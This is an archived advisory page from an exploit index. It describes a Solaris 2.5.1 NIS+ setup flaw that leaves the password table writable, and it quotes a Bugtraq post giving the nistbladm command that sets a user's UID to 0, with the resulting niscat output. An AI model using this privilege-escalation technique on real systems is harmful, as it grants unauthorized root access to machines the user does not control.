Insecure Solaris default nissetup password table permissions!

Summary
Description:The nissetup.sh program for setting up NIS+ databases leaves insecure permissions on the password table. This allows you to, for example, use nistbladm to change your UID!
Author:Well known
Compromise: root (local)
Vulnerable Systems:Unpatched Solaris 2.5.1 systems (possibly earlier versions of Solaris).
Date:10 February 1996
Notes:Here is an anonymous posting reminding us of the problem. Also, Casper Dik (casper@HOLLAND.SUN.COM) mentioned that just installing the Solaris patch doesn't fix the problem. You need to manually reset the bad permissions. How many people do you think forgot to do that?
Details


Date: Fri, 30 May 1997 19:44:40 +0200
From: Anonymous <nobody@REPLAY.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: NIS+, Solaris 2.5.1

Ever tried to change your NIS+ password with
the "nistbladm" command ? Works fine, but you
can also change your UID ....

$ nistbladm -e uid=0 '[name=alice]',passwd.org_dir

$ niscat passwd.org_dir | grep alice
alice:xedvtAgfruijg:0:1001:........


. . . . . . . . . . .

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]